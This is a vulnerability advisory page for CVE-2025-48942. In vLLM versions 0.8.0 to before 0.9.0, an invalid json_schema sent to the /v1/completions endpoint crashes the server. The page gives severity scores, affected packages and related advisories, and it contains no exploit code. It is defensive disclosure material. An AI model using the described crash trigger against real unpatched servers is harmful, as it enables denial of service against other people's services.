CVE-2025-48942Uncaught Exception in Vllm

CWE-248Uncaught Exception8 documents4 sources
Severity
6.5MEDIUMNVD
EPSS
0.2%
top 56.55%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
Timeline
PublishedMay 30

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:HExploitability: 2.8 | Impact: 3.6

Affected Packages3 packages

NVDvllm/vllm0.8.00.9.0
PyPIvllm/vllm0.8.00.9.0+1
CVEListV5vllm-project/vllm>= 0.8.0, < 0.9.0

Patches

🔴Vulnerability Details

4
OSV
CVE-2025-48943: vLLM is an inference and serving engine for large language models (LLMs)2025-05-30
OSV
CVE-2025-48942: vLLM is an inference and serving engine for large language models (LLMs)2025-05-30
OSV
vLLM DOS: Remotely kill vllm over http with invalid JSON schema2025-05-28
GHSA
vLLM DOS: Remotely kill vllm over http with invalid JSON schema2025-05-28

📋Vendor Advisories

2
Red Hat
vllm: Remote crash of vllm server with invalid regex2025-05-30
Red Hat
vllm: vLLM denial of service via invalid JSON schema2025-05-30